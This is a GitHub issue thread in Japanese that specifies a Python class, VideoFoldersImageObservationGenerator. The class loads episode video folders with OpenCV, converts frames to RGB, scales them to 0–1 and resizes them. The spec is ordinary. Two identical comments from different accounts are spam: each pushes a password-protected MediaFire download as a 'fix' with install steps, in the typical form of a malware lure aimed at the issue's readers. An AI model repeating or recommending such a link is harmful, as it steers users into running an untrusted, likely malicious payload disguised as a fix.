### ISSUE TITLE
動画を読み込んで観測として提供するobservation generatorクラスを実装

### ISSUE THREAD

**Issue by Geson-anko** [MLShukai/ami-vconf24#87]
# タスク内容

収集した観測動画データを読み込み、画像観測として提供するクラスを実装する。

### 仕様

* 一つのエピソードに対して、動画は1つのフォルダに複数生成される。よってフォルダを受け取る。読み込む
  * 複数エピソードを連結して扱えるようにするため、複数のフォルダのリストを受け取り、その順番ごとに読み込んで使用する。
  * ファイルの順序は名前順にソートされる。
  * `VideoFoldersImageObservationGenerator`という名前が望ましい。
* 動画の拡張子はデフォルトで`mp4`とする。引数でいくつか指定可能にする。
* 引数 `start_frame_per_videos: int | list[int] = 0` ビデオの開始フレーム位置。 リストで渡された場合はその長さがフォルダ長と一致しない場合にassertion error
* 引数 `video_frames_per_videos: int | None | list[int | None] = None` 各Videoフォルダから使用するフレームカウントの数。Noneの場合は最大まで使用する。リストで渡された場合はその長さがフォルダ長と一致しない場合にassertion error。 またフォルダ内のすべてのVideoFilesのフレーム合計数がその値に満たない場合は Assertion Error
* cv2.VideoCaptureを使用する
* BGRからRGBへ変換する。
* スケールレンジは0-255 -> 0-1へスケール, floatへ
* 画像サイズは引数 `image_size`で指定する。resizeして返す

### 達成条件

- [ ] VideoFoldersImageObservationGeneratorの実装
- [ ] テストコード

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
